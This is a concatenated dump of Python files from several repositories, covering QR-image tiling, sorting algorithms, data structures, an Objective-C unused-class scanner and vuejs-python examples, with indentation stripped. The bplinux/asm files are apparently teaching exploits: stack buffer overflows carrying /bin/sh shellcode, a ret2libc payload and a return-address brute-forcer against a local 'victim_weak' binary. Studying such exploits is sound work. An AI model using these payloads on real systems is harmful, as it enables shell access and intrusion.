Final_img=Image.new('RGB',(1100,800))
img.thumbnail((110,110))
for i in xrange(0,1100,100):
for j in xrange(0,800,100):
flag+=1
Final_img.paste(img,(i,j))
if flag==88:
Final_img.save('Final image1.png')
elif flag==176:
Final_img.save('Final image2.png')
elif flag==249:
Final_img.save('Final image2.png')
|
importerror/Python-QR-code | merge_image.py | import Image
img=Image.open("scan1.png")
new_img=Image.new('RGB',(1100,800))
img.thumbnail((110,110))
for i in xrange(0,1100,100):
for j in xrange(0,800,100):
new_img.paste(img,(i,j))
new_img.save('new scan1.png')
new_img.show()
|
importerror/Python-QR-code | PrimeNumber.py | import re, sys
def isPrime(n):
return re.match(r'^1?$|^(11+?)\1+$', '1' * n) == None
N = 249 #students
M = 100
l = list()
while len(l) < N:
l += filter(isPrime, range(M - 100, M))
M += 100
for i in l:
print i
|
importerror/Python-QR-code | Comb_image3.py | <filename>Comb_image3.py<gh_stars>0
from qrcode import *
import re, sys
import Image
img179=Image.open('scan1116J.png')
img180=Image.open('scan1134K.png')
img181=Image.open('scan1138L.png')
img182=Image.open('scan1140M.png')
img183=Image.open('scan1144N.png')
img184=Image.open('scan1150O.png')
img185=Image.open('scan1156P.png')
img186=Image.open('scan1164Q.png')
img187=Image.open('scan1170R.png')
img188=Image.open('scan1176S.png')
img189=Image.open('scan1198T.png')
img190=Image.open('scan1200U.png')
img191=Image.open('scan1210V.png')
img192=Image.open('scan1218W.png')
img193=Image.open('scan1228X.png')
img194=Image.open('scan1234Y.png')
img195=Image.open('scan1240Z.png')
img196=Image.open('scan1248A.png')
img197=Image.open('scan1260B.png')
img198=Image.open('scan1264C.png')
img199=Image.open('scan1270D.png')
img200=Image.open('scan1276E.png')
img201=Image.open('scan1278F.png')
img202=Image.open('scan1284G.png')
img203=Image.open('scan1296H.png')
img204=Image.open('scan1306I.png')
img205=Image.open('scan1324J.png')
img206=Image.open('scan1326K.png')
img207=Image.open('scan1330L.png')
img208=Image.open('scan1336M.png')
img209=Image.open('scan1338N.png')
img210=Image.open('scan1344O.png')
img211=Image.open('scan1348P.png')
img212=Image.open('scan1350Q.png')
img213=Image.open('scan1354R.png')
img214=Image.open('scan1366S.png')
img215=Image.open('scan1368T.png')
img216=Image.open('scan1374U.png')
img217=Image.open('scan1408V.png')
img218=Image.open('scan1414W.png')
img219=Image.open('scan1420X.png')
img220=Image.open('scan1428Y.png')
img221=Image.open('scan1446Z.png')
img222=Image.open('scan1456A.png')
img223=Image.open('scan1470B.png')
img224=Image.open('scan1474C.png')
img225=Image.open('scan1476D.png')
img226=Image.open('scan1480E.png')
img227=Image.open('scan1486F.png')
img228=Image.open('scan1494G.png')
img229=Image.open('scan1498H.png')
img230=Image.open('scan1500I.png')
img231=Image.open('scan1506J.png')
img232=Image.open('scan1518K.png')
img233=Image.open('scan1528L.png')
img234=Image.open('scan1530M.png')
img235=Image.open('scan1534N.png')
img236=Image.open('scan1536O.png')
img237=Image.open('scan1540P.png')
img238=Image.open('scan1546Q.png')
img239=Image.open('scan1558R.png')
img240=Image.open('scan1570S.png')
img241=Image.open('scan1578T.png')
img242=Image.open('scan1590U.png')
img243=Image.open('scan1596V.png')
img244=Image.open('scan1600W.png')
img245=Image.open('scan1606X.png')
img246=Image.open('scan1614Y.png')
img247=Image.open('scan1618Z.png')
img248=Image.open('scan1626A.png')
img249=Image.open('scan1630B.png')
Final_img=Image.new('RGB',(1600,1200))
img179.thumbnail((110,110))
img180.thumbnail((110,110))
img181.thumbnail((110,110))
img182.thumbnail((110,110))
img183.thumbnail((110,110))
img184.thumbnail((110,110))
img185.thumbnail((110,110))
img186.thumbnail((110,110))
img187.thumbnail((110,110))
img188.thumbnail((110,110))
img189.thumbnail((110,110))
img190.thumbnail((110,110))
img191.thumbnail((110,110))
img192.thumbnail((110,110))
img193.thumbnail((110,110))
img194.thumbnail((110,110))
img195.thumbnail((110,110))
img196.thumbnail((110,110))
img197.thumbnail((110,110))
img198.thumbnail((110,110))
img199.thumbnail((110,110))
img200.thumbnail((110,110))
img201.thumbnail((110,110))
img202.thumbnail((110,110))
img203.thumbnail((110,110))
img204.thumbnail((110,110))
img205.thumbnail((110,110))
img206.thumbnail((110,110))
img207.thumbnail((110,110))
img208.thumbnail((110,110))
img209.thumbnail((110,110))
img210.thumbnail((110,110))
img211.thumbnail((110,110))
img212.thumbnail((110,110))
img213.thumbnail((110,110))
img214.thumbnail((110,110))
img215.thumbnail((110,110))
img216.thumbnail((110,110))
img217.thumbnail((110,110))
img218.thumbnail((110,110))
img219.thumbnail((110,110))
img220.thumbnail((110,110))
img221.thumbnail((110,110))
img222.thumbnail((110,110))
img223.thumbnail((110,110))
img224.thumbnail((110,110))
img225.thumbnail((110,110))
img226.thumbnail((110,110))
img227.thumbnail((110,110))
img228.thumbnail((110,110))
img229.thumbnail((110,110))
img230.thumbnail((110,110))
img231.thumbnail((110,110))
img232.thumbnail((110,110))
img233.thumbnail((110,110))
img234.thumbnail((110,110))
img235.thumbnail((110,110))
img236.thumbnail((110,110))
img237.thumbnail((110,110))
img238.thumbnail((110,110))
img239.thumbnail((110,110))
img240.thumbnail((110,110))
img241.thumbnail((110,110))
img242.thumbnail((110,110))
img243.thumbnail((110,110))
img244.thumbnail((110,110))
img245.thumbnail((110,110))
img246.thumbnail((110,110))
img247.thumbnail((110,110))
img248.thumbnail((110,110))
img249.thumbnail((110,110))
i=110
j=110
Final_img.paste(img179,(0,0*1))
Final_img.paste(img180,(0,j*1))
Final_img.paste(img181,(0,j*2))
Final_img.paste(img182,(0,j*3))
Final_img.paste(img183,(0,j*4))
Final_img.paste(img184,(0,j*5))
Final_img.paste(img185,(0,j*6))
Final_img.paste(img186,(0,j*7))
Final_img.paste(img187,(0,j*8))
Final_img.paste(img188,(0,j*9))
Final_img.paste(img189,(i*1,0*1))
Final_img.paste(img190,(i*1,j*1))
Final_img.paste(img191,(i*1,j*2))
Final_img.paste(img192,(i*1,j*3))
Final_img.paste(img193,(i*1,j*4))
Final_img.paste(img194,(i*1,j*5))
Final_img.paste(img195,(i*1,j*6))
Final_img.paste(img196,(i*1,j*7))
Final_img.paste(img197,(i*1,j*8))
Final_img.paste(img198,(i*1,j*9))
Final_img.paste(img199,(i*2,j*0))
Final_img.paste(img200,(i*2,j*1))
Final_img.paste(img201,(i*2,j*2))
Final_img.paste(img202,(i*2,j*3))
Final_img.paste(img203,(i*2,j*4))
Final_img.paste(img204,(i*2,j*5))
Final_img.paste(img205,(i*2,j*6))
Final_img.paste(img206,(i*2,j*7))
Final_img.paste(img207,(i*2,j*8))
Final_img.paste(img208,(i*2,j*9))
Final_img.paste(img209,(i*3,j*0))
Final_img.paste(img210,(i*3,j*1))
Final_img.paste(img211,(i*3,j*2))
Final_img.paste(img212,(i*3,j*3))
Final_img.paste(img213,(i*3,j*4))
Final_img.paste(img214,(i*3,j*5))
Final_img.paste(img215,(i*3,j*6))
Final_img.paste(img216,(i*3,j*7))
Final_img.paste(img217,(i*3,j*8))
Final_img.paste(img218,(i*3,j*9))
Final_img.paste(img219,(i*4,j*0))
Final_img.paste(img220,(i*4,j*1))
Final_img.paste(img221,(i*4,j*2))
Final_img.paste(img222,(i*4,j*3))
Final_img.paste(img223,(i*4,j*4))
Final_img.paste(img224,(i*4,j*5))
Final_img.paste(img225,(i*4,j*6))
Final_img.paste(img226,(i*4,j*7))
Final_img.paste(img227,(i*4,j*8))
Final_img.paste(img228,(i*4,j*9))
Final_img.paste(img229,(i*5,j*0))
Final_img.paste(img230,(i*5,j*1))
Final_img.paste(img231,(i*5,j*2))
Final_img.paste(img232,(i*5,j*3))
Final_img.paste(img233,(i*5,j*4))
Final_img.paste(img234,(i*5,j*5))
Final_img.paste(img235,(i*5,j*6))
Final_img.paste(img236,(i*5,j*7))
Final_img.paste(img237,(i*5,j*8))
Final_img.paste(img238,(i*5,j*9))
Final_img.paste(img239,(i*6,j*0))
Final_img.paste(img240,(i*6,j*1))
Final_img.paste(img241,(i*6,j*2))
Final_img.paste(img242,(i*6,j*3))
Final_img.paste(img243,(i*6,j*4))
Final_img.paste(img244,(i*6,j*5))
Final_img.paste(img245,(i*6,j*6))
Final_img.paste(img246,(i*6,j*7))
Final_img.paste(img247,(i*6,j*8))
Final_img.paste(img248,(i*6,j*9))
Final_img.paste(img249,(i*7,j*0))
Final_img.save('Final image3.png')
|
bplinux/asm | examples/x64/02/bruteforce.py | <gh_stars>0
#!/usr/bin/python
import subprocess
import struct
import sys
buffsize = 512
offset = 0
start = 0x7fffffffd9e0
end = 0x7fffffffe000
#/bin/sh
sc = b'\xeb\x14\x5f\x48\x31\xc0\x88\x47\x07\x50\x57\x48\x8d\x34\x24\xb0\x3b\x48\x31\xd2\x0f\x05\xe8\xe7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'
nopsled1 = b'\x90'*(buffsize-len(sc)-8)
nopsled2 = b'\x90'*8
rbp = b'\x90'*8
rip = struct.pack("<Q", start)
payload = nopsled1+sc+nopsled2+rbp+rip
returnvalue=-1
while returnvalue!=0:
try:
returnvalue = subprocess.call(['./victim_weak', payload[:-2]])
except:
pass
print("Trying " + str(rip))
start+=8
rip = struct.pack("<Q", start)
payload = nopsled1+sc+nopsled2+rbp+rip
|
bplinux/asm | examples/x64/01/control_rip.py | <gh_stars>0
#!/usr/bin/python
import struct
import sys
buffsize = 512
offset = 0
nopsled = b'\x90'*(buffsize)
rbp = b'\x90'*8
rip = struct.pack("<Q", 0xdeadbeefdeadbeef)
sys.stdout.buffer.write(nopsled+rbp+rip)
|
bplinux/asm | examples/x64/03/control_rip.py | #!/usr/bin/python
import struct
import sys
buffsize = 512
offset = 0
#system: 0x7ffff7e19120
#exit: 0x7ffff7e0e820
#/bin/sh: 0x7ffff7f5b966
#/bin/sh
#sc = b'\xeb\x14\x5f\x48\x31\xc0\x88\x47\x07\x50\x57\x48\x8d\x34\x24\xb0\x3b\x48\x31\xd2\x0f\x05\xe8\xe7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'
nopsled = b'\x90'*(buffsize)
system = struct.pack("<Q", 0x7ffff7e19120)
binsh = struct.pack("<Q", 0x7ffff7f5b966)
sys.stdout.buffer.write(nopsled+system+binsh)
|
bplinux/asm | scripts/control_eip.py | <gh_stars>0
#!/usr/bin/python
import struct
import sys
buffsize = 512
offset = 0
#system(): 0x7ffff7e1d120
#exit(): 0x7ffff7e12820
#"/bin/sh": 0x7ffff7f5f966
padding = b'\x90'*(buffsize)
ebp = b'\x90'*8
eip = b'\x20\xd1\xe1\xf7\xff\x7f'
garbage = b'\x90'*8
string = b'\x66\xf9\xf5\xf7\xff\x7f'
sys.stdout.buffer.write(padding+ebp+eip+garbage+string)
|
bplinux/asm | examples/x64/02/control_rip.py | #!/usr/bin/python
import struct
import sys
buffsize = 512
offset = 0
#/bin/sh
sc = b'\xeb\x14\x5f\x48\x31\xc0\x88\x47\x07\x50\x57\x48\x8d\x34\x24\xb0\x3b\x48\x31\xd2\x0f\x05\xe8\xe7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68'
nopsled1 = b'\x90'*(buffsize-len(sc)-8)
nopsled2 = b'\x90'*8
rbp = b'\x90'*8
rip = struct.pack("<Q", 0x7fffffffe958)
sys.stdout.buffer.write(nopsled1+sc+nopsled2+rbp+rip)
|
devhoodit/dataStructure-and-algorithm | src/dataStructure/python/tab2space.py | <reponame>devhoodit/dataStructure-and-algorithm<filename>src/dataStructure/python/tab2space.py
tmp = []
with open('ds.py','r') as f:
for line in f.readlines():
tmp.append(line.replace('\t', ' '))
with open('ds.py', 'w') as f:
f.writelines(tmp) |
devhoodit/dataStructure-and-algorithm | src/algorithm/sort.py | import sys
from os import path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
from dataStructure.python import ds
"""
sorting examples
comparison sort
-bubble sort
-quick sort
selection sort
-selection sort
merge sort
-merge sort
"""
"""
bubble sort
1. take first value, first step n = 0
2. compare with next value, if current value is bigger than next value then swap
3. repeat 1-2 step (list length - n - 1) times
4. n += 1
5. repeat 1-4 step (list length) times
"""
def bubble_sort(arr):
l = len(arr)
for i in range(l):
for j in range(l - i - 1):
if arr[j] > arr[j+1]:
arr[j], arr[j+1] = arr[j+1], arr[j]
"""
quick sort
Ref) https://ko.wikipedia.org/wiki/%ED%80%B5_%EC%A0%95%EB%A0%AC - pseudocode
1. set random pivot
2. divide list base on pivot value
3. repeat 1-2 step until list length become 1 using recursive
4. return list and concatenate
"""
"""
using more memory(make additional list)
"""
def _quick_sort(arr):
less, greater = [], []
if len(arr) <= 1:
return arr
pivot = arr.pop(len(arr)//2)
for index in arr:
if pivot < index:
greater.append(index)
else:
less.append(index)
return _quick_sort(less) + [pivot] + _quick_sort(greater)
"""
using only one list(need less memory)
1. set random pivot
2. divide base on pivot value in current range -> partition
3. recursive(pass right and left range)
4. repeat 1-3 step until arr no more need to divide
"""
def quick_sort(arr):
def partition(arr, left, right, pivot_index):
pivot = arr[pivot_index]
arr[pivot_index], arr[right] = arr[right], arr[pivot_index]
stored_index = left
for i in range(left, right):
if arr[i] <= pivot:
arr[i], arr[stored_index] = arr[stored_index], arr[i]
stored_index += 1
arr[stored_index], arr[right] = arr[right], arr[stored_index]
return stored_index
def recursive_quick_sort(arr, left, right):
if right > left:
pivot = (left+right)//2
pivot = partition(arr, left, right, pivot)
recursive_quick_sort(arr, left, pivot-1)
recursive_quick_sort(arr, pivot+1, right)
recursive_quick_sort(arr, 0, len(arr)-1)
return arr
"""
selection sort
1. find min value index in range( n ~ list length - 1), first try n = 0
2. swap(min value index, n)
3. repeat 1-2 step (list length) times
"""
def selection_sort(arr):
l = len(arr)
for i in range(l):
min = i
for j in range(i+1, l):
if arr[min] > arr[j]:
min = j
arr[min], arr[i] = arr[i], arr[min]
return arr
"""
heap sort
"""
def heap_sort(arr):
pass
"""
merge sort
1. divide array until all array size = 1
2. merge two array. sort, (already each of arrays sorted, compare only first element of each array)
"""
def merge_sort(arr):
def _merge(arr, l, mid, r):
tmp = []
tl = l
rl = mid + 1
while tl <= mid and rl <= r:
if arr[tl] < arr[rl]:
tmp.append(arr[tl])
tl += 1
else:
tmp.append(arr[rl])
rl += 1
if tl > mid:
for n in range(r - rl + 1):
tmp.append(arr[rl + n])
else:
for n in range(mid - tl + 1):
tmp.append(arr[tl + n])
for n, index in enumerate(tmp):
arr[l + n] = index
def _merge_sort(arr, l, r):
if l < r:
mid = (l + r) // 2
_merge_sort(arr, l, mid)
_merge_sort(arr, mid + 1, r)
_merge(arr, l, mid, r)
_merge_sort(arr, 0, len(arr) - 1)
return arr
def sort(method):
origin_data = []
while input_data := input():
try:
input_numbers = map(int, input_data.split())
origin_data += input_numbers
origin_data = method(origin_data)
print(*origin_data)
except Exception as e:
print(e)
sort(merge_sort) |
devhoodit/dataStructure-and-algorithm | src/dataStructure/python/ds.py | from collections.abc import Sequence
from queue import Empty
class Stack():
def __init__(self, length):
self.stack = []
self.max_length = length
def __len__(self):
return len(self.stack)
def is_full(self):
return len(self.stack) >= self.max_length
def is_empty(self):
return len(self.stack) == 0
def push(self, data):
if self.is_full():
raise IndexError("stack overflow")
else:
self.stack.append(data)
def pop(self):
if self.is_empty():
raise IndexError("stack underflow")
else:
return self.stack.pop()
class ArrayStack():
def __init__(self, length):
self.stack = [None for _ in range(length)]
self.max_length = length
self.cur_pos = 0
def __len__(self):
return self.cur_pos
def is_full(self):
return self.cur_pos >= self.max_length
def is_empty(self):
return self.cur_pos == 0
def push(self, data):
if self.is_full():
raise IndexError("stack overflow")
else:
self.stack[self.cur_pos] = data
self.cur_pos += 1
def pop(self):
if self.is_empty():
raise IndexError("stack underflow")
else:
self.cur_pos -= 1
tmp = self.stack[self.cur_pos]
self.stack[self.cur_pos] = None
return tmp
class Heap():
class Heap():
def __init__(self):
self.heap = [None]
self.size = 0
def __len__(self):
return self.size
def __iter__(self):
return self
def __next__(self):
if self.size <= 0:
raise StopIteration
return self.pop()
def is_empty(self):
return self.size <= 0
class MaxHeap(Heap):
def push(self, value):
self.heap.append(value)
self.size += 1
i = self.size
while i != 1 and value > self.heap[i//2]:
self.heap[i], self.heap[i//2] = self.heap[i//2], self.heap[i]
i //= 2
def pop(self):
if self.is_empty():
raise IndexError()
tmp = self.heap[1]
self.heap[1] = self.heap[-1]
self.heap.pop()
self.size -= 1
parent = 1
child = 2
while child <= self.size:
# check parent node have enough child node(2 nodes)
# find which child node is bigger(guarantee parent node is bigger than child nodes when swap)
if child+1 < self.size and self.heap[child] < self.heap[child+1]:
child += 1
if self.heap[child] > self.heap[parent]:
self.heap[child], self.heap[parent] = self.heap[parent], self.heap[child]
else:
break
parent = child
child *= 2
return tmp
class MinHeap(Heap):
def push(self, value):
self.heap.append(value)
self.size += 1
i = self.size
while i != 1 and value < self.heap[i//2]:
self.heap[i], self.heap[i//2] = self.heap[i//2], self.heap[i]
i //= 2
def pop(self):
if self.is_empty():
raise IndexError()
tmp = self.heap[1]
self.heap[1] = self.heap[-1]
self.heap.pop()
self.size -= 1
parent = 1
child = 2
while child < self.size:
if child+1 < self.size and self.heap[child] > self.heap[child+1]:
child += 1
if self.heap[child] < self.heap[parent]:
self.heap[child], self.heap[parent] = self.heap[parent], self.heap[child]
else:
break
parent = child
child *= 2
return tmp
class Queue():
def __init__(self) -> None:
self.queue = []
def __len__(self):
return len(self.queue)
def is_empty(self):
return len(self.queue) == 0
def enqueue(self, data):
self.queue.append(data)
def dequeue(self):
if self.is_empty():
raise Empty('Queue is empty')
else:
return self.queue.pop(0)
def first(self):
if self.is_empty():
raise Empty('Queue is empty')
else:
return self.queue[0]
class ArrayQueue():
def __init__(self, length=10):
self.queue = [None for _ in range(length)]
self.length = length
self.f = 0
self.size = 0
def __len__(self):
return self.size
def _is_full(self):
return self.size >= self.length
def _resize(self):
tmp = [None] * self.length * 2
walk = self.f
for k in range(self.length):
tmp[k] = self.queue[walk]
walk = (walk + 1) % self.length
self.queue = tmp
self.f = 0
self.length *= 2
def is_empty(self):
return self.size == 0
def enqueue(self, data):
if self._is_full():
self._resize()
self.queue[(self.f + self.size) % self.length] = data
self.size += 1
def dequeue(self):
if self.is_empty():
raise Empty("Queue is empty")
else:
tmp = self.queue[self.f]
self.queue[self.f] = None
self.f = (self.f + 1) % self.length
self.size -= 1
return tmp
class Tree:
def __init__(self):
pass
class Node:
class Node:
def __init__(self, data, link=None):
self.data = data
self.link = link
def __iter__(self):
self.cursor = self
return self
def __next__(self):
if self.cursor == None:
raise StopIteration
else:
tmp = self.cursor.data
self.cursor = self.cursor.link
return tmp
def push(self, data):
link = self
while link.link != None:
link = link.link
tmp = Node(data)
link.link = tmp
class dNode:
def __init__(self, data, left_link=None, right_link=None):
self.data = data
self.left_link = left_link
self.right_link = right_link
class LinkedList:
class LinkedList(Node.Node):
def __init__(self):
pass
class DoubleLinkedList():
def __init__(self):
self.length = 0
self.link = None
def __len__(self):
return self.length
def append(self, data):
cursor = self.link
while cursor:
cursor = cursor.right_link
tmp = Node.dNode(data, left_link=cursor)
if self.length == 0:
self.link = tmp
else:
cursor.right_link = tmp
self.length += 1
def pop(self, n):
cursor = self.link
for _ in range(n):
cursor = cursor.right_link
if n == 0:
cursor.left_link.link = cursor.right_link
cursor.right_link.left_link = cursor.left_link
else:
cursor.left_link.right_link = cursor.right_link.left_link
cursor.right_link.left_link = cursor.left_link.right_link
return cursor.data
|
Olincy/iOS-Unused-Classes-Tool | unused_classes.py | <reponame>Olincy/iOS-Unused-Classes-Tool<gh_stars>1-10
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import sys,os,re
# 匹配class 的申明 ^[ ]*@interface[ ]+([a-zA-Z_][\w]+)[ ]*:
# 匹配被使用的class (?:[<]*([A-Z_][\w]+)[ ]+\*[>]*)|(?:.*\[[ ]*([A-Z_][\w]+)[ ].*\])|(?:[:][ ]*([A-Z_][\w]+))
CLASS_NAME_KEY = "CLASS_NAME_KEY"
CLASS_COUNT_KEY = "CLASS_COUNT_KEY"
SCAN_CLASS_DEF= "SCAN_CLASS_DEF" #扫描类的申明
SCAN_CLASS_USE = "SCAN_CLASS_USE" # 扫描类的使用
temp_classes = []
# 匹配类
def match_class(line,regex,scan_type):
matches = re.finditer(regex, line, re.MULTILINE)
for matchNum, match in enumerate(matches, start=1):
for groupNum in range(0, len(match.groups())):
groupNum = groupNum + 1
matched_class = "{group}".format(group = match.group(groupNum))
if scan_type == SCAN_CLASS_DEF:
temp_classes.append(matched_class)
else:
for item in temp_classes[:]:
if matched_class == item:
temp_classes.remove(item)
def walk_files(scan_type, dirname, names):
# 不扫描Pods中的文件
if dirname.endswith("/Pods") or ("/Pods/" in dirname):
return;
# 不扫描framework中的文件
if dirname.endswith(".framework") or (".framework/" in dirname):
return;
for file in names:
# if file.startswith("TC"): //过滤前缀
file_path = ("%s/%s"%(dirname,file))
if os.path.isfile(file_path):
file_name = os.path.splitext(file)[0]
file_type = os.path.splitext(file)[-1]
if file_type in ('.h','.m','.mm'):
print "checking file:",file
f = open(file_path)
for line in f:
regex = ""
if scan_type == SCAN_CLASS_DEF:# 匹配类的申明
regex = r"^[ ]*@interface[ ]+([a-zA-Z_][\w]+)[ ]*:"
else: # 匹配类的使用
regex = r"(?:[<]*([A-Z_][\w]+)[ ]+\*[>]*)|(?:.*\[[ ]*([A-Z_][\w]+)[ ].*\])|(?:[:][ ]*([A-Z_][\w]+))"
match_class(line,regex,scan_type)
f.close()
def check(dir):
try:
os.chdir(dir)
except Exception as e:
print e
sys.exit(2)
else:
print 'change to dir:',os.getcwd()
print "---------begin-------\n"
print "checking defined classes:\n"
os.path.walk(dir, walk_files, SCAN_CLASS_DEF)
# print "\n====== here is the defined classes({num}) ======\n".format(num=len(temp_classes))
# for class_key in temp_classes:
# print class_key
print "now checking unused classes:\n"
os.path.walk(dir, walk_files, SCAN_CLASS_USE)
header = "\n====== here is the unused classes ======\n"
print header
f = open("unused_classes_report.txt","w")
f.write(header)
for class_key in temp_classes:
print class_key
f.write(class_key+'\n')
f.write("\nTotal count:{num}\n".format(num=len(temp_classes)))
f.close()
print "\n---------complete(total count:{num})---------\n".format(num=len(temp_classes))
print "A report file is generated in: {dir}".format(dir=os.getcwd())
print 'use "cat {dir}/unused_classes_report.txt"\n'.format(dir=os.getcwd())
finally:
pass
def main(argv):
dir = argv[0]
if len(argv) > 1:
print "usage: python unused_classes.py <your-project-directory>"
sys.exit()
elif len(argv) <= 0:
dir = '.'
# print "check in current directory。"
# else:
# print 'check in directory:',dir
check(dir)
if __name__ == "__main__":
main(sys.argv[1:]) |
twitwi/vuejs-python | vuejspython/observablecollections/observable.py | import types
from .event import Event
class Observable:
def __init__(self):
self.observers = set()
def attach(self, observer):
if (observer not in self.observers):
self.observers.add(observer)
def detach(self, observer):
if (observer in self.observers):
self.observers.remove(observer)
def raiseEvent(self, name, **kwargs):
event = Event(name, self)
for key, value in kwargs.items():
setattr(event, key, value)
for eventObserver in self.observers:
eventObserver(event)
|
twitwi/vuejs-python | examples/example-3.py | <filename>examples/example-3.py
import asyncio
from vuejspython import model, start
@model
class Comp:
# define properties to forward to vue (or not)
i = 42
j = 111
def __init__(self):
self.i = 1
def computed_i_squared(self): return self.i**2
def computed_i_mod2(self): return self.i%2
def computed_odd(self): return self.i_mod2 == 1
def computed_even(self): return not self.odd
def computed_iorisquared(self): return self.i if self.odd else self.i_squared
def computed_iorj(self): return self.i if self.even else self.j
def computed_loopy(self): return self.iorisquared # + self.loopy2 # causes recursion error
def computed_loopy2(self): return self.iorj + self.loopy
async def demo_incr(self, t, v):
while True:
await asyncio.sleep(t)
self.i += v
async def meth1(self, v):
print("Com", v)
self.subtitle = "Changed: "+v # will not trigger change as _novue
if v == '+1':
self.i += 1
#await self._up('i')
start(Comp())
|
twitwi/vuejs-python | vuejspython/observablecollections/event.py | <filename>vuejspython/observablecollections/event.py
class Event:
def __init__(self, action, source):
self._action = action
self._source = source
@property
def action(self):
return self._action
@property
def source(self):
return self._source |
twitwi/vuejs-python | examples/example-6.py | <reponame>twitwi/vuejs-python
import asyncio
from vuejspython import model, start, atomic
import numpy as np
import matplotlib.pyplot as plt
import io
@model
class Comp:
# define properties to forward to vue (or not)
im = np.zeros((1,))
xp = np.zeros((1,))
yp = np.zeros((1,))
xm = np.zeros((1,))
ym = np.zeros((1,))
_v_nobroadcast = ['d1m', 'd1p']
def __init__(self):
self.draw_set2pluses()
self.draw_dataset()
def computed_xmin(self): return self.x.min()
def computed_xmax(self): return self.x.max()
def computed_dx(self): return (self.x.max() - self.x.min()) / (np.prod(self.x.shape)-1)
def computed_ymin(self): return self.y.min()
def computed_ymax(self): return self.y.max()
def computed_dy(self): return (self.y.max() - self.y.min()) / (np.prod(self.y.shape)-1)
def computed_d1m(self): return np.min( ((self.x-self.xm)**2 + (self.y-self.ym)**2)**0.5, axis=2)
def computed_d1p(self): return np.min( ((self.x-self.xp)**2 + (self.y-self.yp)**2)**0.5, axis=2)
def computed_im(self): return np.transpose(self.d1m / (self.d1p+.0001))
@atomic
def draw_dataset(self):
self.x = np.linspace(-1.3, 1.3, 191)[:, None, None]
self.y = np.linspace(-0.87, 0.87, 203)[None, :, None]
rangle = np.random.uniform(0, np.pi*4/3, (1, 1, 300))
rradius = np.random.uniform(1, 1.7, rangle.shape)
self.xm = rradius * np.cos(rangle)
self.ym = rradius*4/6 * np.sin(rangle)
@atomic
def draw_bonedataset(self, t='bone', N=300):
x = np.linspace(-1.3, 1.3, 1000)[:,None]
y = np.linspace(-0.6, 0.6, 600)[None,:]
if t == 'bone':
candidate = (y/0.5)**2 + (x)**2 > 1
candidate |= ((y-0.5)/0.4)**2 + (x/0.5)**2 < 1
candidate |= ((y+0.5)/0.4)**2 + (x/0.5)**2 < 1
else:
candidate = (y/0.5)**2 + (x)**2 > 1
candx,candy = np.where(candidate)
candind = np.random.choice(range(candx.shape[0]), N, replace=False)
self.xm = x[None,None,candx[candind],0]
self.ym = y[None,None,0,candy[candind]]
@atomic
def draw_set2pluses(self):
self.xp = np.array([0, 0.75])[None,None,:]
self.yp = np.array([0, 0])[None,None,:]
@atomic
def draw_somepluses(self, N=20):
self.xp = np.random.uniform(self.xmin, self.xmax, (1,1,N))
self.yp = np.random.uniform(self.ymin, self.ymax, (1,1,N))
start(Comp())
|
twitwi/vuejs-python | examples/example-0.py |
import vuejspython
from numpy import pi
@vuejspython.model
class App:
radius = 2
def computed_area(self):
if self.radius == "": return 0
return pi * self.radius ** 2
vuejspython.start(App())
|
twitwi/vuejs-python | examples/example-9.py |
import vuejspython
import numpy as np
@vuejspython.model
class App:
# input = np.random.uniform(-1000, 1000, 10)
input = 4 + 5*np.sin(np.linspace(-6, 5, 15))
scale = 1
bias = 0
def computed_size(self): return len(self.input)
def computed_scaled(self):
return np.array(self.input) * self.scale
def computed_biased(self):
return np.array(self.scaled) - self.bias
def computed_relu(self):
res = np.copy(self.biased)
#res[res < self.bias] = self.bias
res[res < 0] = 0
return res
def computed_logsoftmax(self):
smax = np.exp(self.relu)
smax /= np.sum(smax)
return np.log(smax + 0.000001)
vuejspython.start(App())
|
twitwi/vuejs-python | vuejspython/serve.py | from aiohttp import web
from pathlib import Path
from glob import glob
from collections import defaultdict
import re
async def index(request):
index_page = """
<!DOCTYPE html>
<html>
<head>
<title>Vuejspython</title>
<link rel=stylesheet href="/static/picnic.min.css">
<style>
body { margin: 2em; }
</style>
</head>
<body>
<h1>HTML files for Vuejspython</h1>
<ul>
""" + '\n'.join([
'<li><a href="{}">{}</a></li>'.format(p, p) for p in sorted(glob('**/*.html', recursive=True))
]) + """
</ul>
</body>
</html>
"""
return web.Response(text=index_page, content_type='text/html')
async def patched_html(request):
print("# HTTP, filesystem:", request.path)
f = request.path
if f.startswith('/'): f = f[1:]
with open(f, 'r') as myfile:
data = myfile.read()
#data = data.replace(r'src="vuejspython.js"', 'src="/static/vuejspython.js"')
return web.Response(text=data, content_type='text/html')
type_from_extension = defaultdict(lambda:'text/html')
type_from_extension['css'] = 'text/css'
type_from_extension['js'] = 'text/javascript'
async def embedded_static(request):
print("# HTTP, embedded:", request.path)
static_dir = Path(__file__).with_name('static')
f = str(static_dir) + '/' + re.sub(r'.*/lib/', '', request.path)
with open(f, 'r') as myfile:
data = myfile.read()
ext = re.sub(r'.*[.]', '', f)
ct = type_from_extension[ext]
return web.Response(text=data, content_type=ct)
def run_http_server(port, host='localhost'):
#static_dir = Path(__file__).with_name('static')
app = web.Application()
app.router.add_get('/', index)
app.router.add_get('/{file:.*[.]html}', patched_html)
app.router.add_get('/{file:.*lib/.*}', embedded_static)
app.router.add_static('/', '.', show_index=True)
web.run_app(app, host=host, port=port)
|
twitwi/vuejs-python | vuejspython/observablecollections/observablelist.py | <filename>vuejspython/observablecollections/observablelist.py
from .observable import Observable
class ObservableList(list, Observable):
def __init__(self, *args, **kwargs):
Observable.__init__(self)
list.__init__(self, *args, **kwargs)
def __iadd__(self, other):
self.extend(other)
return self
def append(self, value):
index = len(self)
list.append(self, value)
self.raiseEvent('itemsAdded', index=index, items=[value])
def insert(self, index, value):
list.insert(self, index, value)
if index > len(self) - 1:
index = len(self) - 1
self.raiseEvent('itemsAdded', index=index, items=[value])
def __setitem__(self, key, value):
if (type(key) is slice):
index = key.start
else:
index = key
oldItem = list.__getitem__(self, key)
list.__setitem__(self, key, value)
self.raiseEvent('itemsUpdated', index=index, oldItems=[oldItem], newItems=[value])
def __delitem__(self, i):
if isinstance(i, slice):
index = i.start
else:
index = i
item = list.__getitem__(self, i)
list.__delitem__(self, i)
self.raiseEvent('itemsRemoved', items=[item], index=index)
def extend(self, seq):
insertIndex = len(self)
list.extend(self, seq)
